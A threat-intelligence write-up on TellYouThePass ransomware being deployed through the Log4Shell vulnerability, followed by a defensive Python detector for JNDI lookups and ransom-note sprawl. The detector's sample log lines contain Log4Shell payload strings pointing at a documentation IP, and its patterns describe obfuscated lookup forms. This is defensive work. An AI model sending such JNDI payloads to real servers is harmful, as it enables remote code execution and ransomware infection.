The Log4j2 exploit Log4Shell is being used to deploy TellYouThePass ransomware, an old and inactive ransomware family; prior to this event, TellYouThePass ransomware had not been mentioned on Twitter since 2020-07-23.
Research has been published in the Chinese-speaking community, but not in the English-speaking community until now. Judging from threat reports, this threat appears to be prominently affecting Chinese victims. We would like to especially highlight that TellYouThePass does not operate as a RaaS (Ransomware-as-a-Service).
- Twitter user @80vul observed that ransomware was deployed on an old system that contained an internet-facing Log4j2 RCE vulnerability; another [now deleted] message was posted, with multiple responses containing references to TellYouThePass.
- Twitter users @Tork_88 and @cibernicola_es responded with an indication that the ransomware family may have been called "TellYouThePass".
- Curated Intel member @PolarToffee responded with an ID-Ransomware (IDR) metric showing that on December 13th, more than 30 samples of "TellYouThePass" ransomware were submitted to IDR, "a very sudden spike in submissions for what is a very old ransomware [that day]." Toffee further elaborates that she is "not saying they are using log4j2 but that's certainly interesting."
- On 2021-12-17, Curated Intel member @PolarToffee provided a follow-up ID-Ransomware (IDR) statistic. In this telemetry, between 2021-12-13 and 2021-12-17, victim geographies submitting ransom notes to IDR included China (20), Hong Kong (2), Japan (2), Taiwan (2), Belarus (1), Thailand (1), and United States (1).
- Sangfor Threat Intelligence Team captured TellYouThePass ransomware samples and conducted an analysis, identifying TellYouThePass ransomware being deployed using the Log4j2 exploit.
- Through honeypot collections, they identified TellYouThePass ransomware launching "thousands of attacks" against "[OA systems and an open-source project]" that contain Log4j2 vulnerabilities.
- The group used the CVE-2021-44228 Log4Shell exploit to carry out an attack en masse.
- The malware communicates with a command and control server as a background task.
- After the exploit executes, the attackers download the ransomware file to the Windows or Linux system and run it to encrypt files.
- Ransom notes are written to files called "README.html".
- The referenced security blog shares what they claim to be "a large number of TellYouThePass ransomware interception logs."
- The group deployed the ransomware "only in the time period from 17:00 to 19:00 on December 12 and 17:00 to 19:00 on December 13, user data in multiple [Chinese] provinces and different industries have been encrypted, and they are all OA systems."
- Curated Intel members @nokae8 and @Myrtus0x0 analyzed a payload delivered to a vulnerable system via the Log4j2 exploit; ransomware was deployed, and based on an analysis of the ransom note, they concluded the ransomware likely belongs to the "TellYouThePass" ransomware family.
- They kindly shared the malicious ransom file and the Java class file via Curated Intel (see below); their contents can be validated against this sample.
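As an added defensive example (not code from this write-up or from any of the teams it cites), the following Python script flags Log4Shell lookup attempts in web access-log lines and checks a file listing for the README.html ransom note described above. The log lines, file paths and IP addresses are constructed, and the URL-decoding and lookup-normalization steps are my assumptions about how such requests reach a logging application.

```python
import re
from collections import Counter
from pathlib import PurePosixPath
from urllib.parse import unquote

# Constructed sample access-log lines (not from the page): a benign request,
# a JNDI lookup in the User-Agent header, and one URL-encoded in the path.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [12/Dec/2021:17:03:11 +0800] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2021:17:04:52 +0800] "GET /oa/ HTTP/1.1" 200 88 "-" "${jndi:ldap://203.0.113.9/a}"',
    '203.0.113.9 - - [12/Dec/2021:17:05:01 +0800] "GET /%24%7Bjndi%3Armi%3A//203.0.113.9/b%7D HTTP/1.1" 404 0 "-" "curl/7.68.0"',
]

# Log4j resolves nested lookups before acting on them, so detection must do the same:
# ${lower:X} / ${upper:X} reduce to X, and ${anything:-X} reduces to its default X.
_INNER_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}|\$\{[^{}]*:-([^{}]*)\}", re.I)
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize_lookups(text: str) -> str:
    """URL-decode (twice, for double-encoded requests) and collapse inner lookups until stable."""
    text = unquote(unquote(text))
    previous = None
    while previous != text:
        previous = text
        text = _INNER_LOOKUP.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), text)
    return text


def find_log4shell_attempts(lines):
    """Return the raw log lines whose normalized form contains a JNDI lookup."""
    return [line for line in lines if _JNDI_LOOKUP.search(normalize_lookups(line))]


def ransom_note_directories(paths, min_dirs: int = 3):
    """Host-side indicator: README.html dropped into many directories at once.

    Returns the sorted directories holding README.html when at least `min_dirs`
    distinct directories are affected, otherwise an empty list (single notes are not flagged)."""
    dirs = Counter(str(PurePosixPath(p).parent) for p in paths if PurePosixPath(p).name.lower() == "readme.html")
    return sorted(dirs) if len(dirs) >= min_dirs else []


if __name__ == "__main__":
    for hit in find_log4shell_attempts(SAMPLE_ACCESS_LOG):
        print("log4shell attempt:", hit)
    # Constructed file listing resembling a post-encryption host (not from the page).
    print(ransom_note_directories(["/srv/oa/README.html", "/srv/oa/docs/README.html", "/home/app/README.html"]))
```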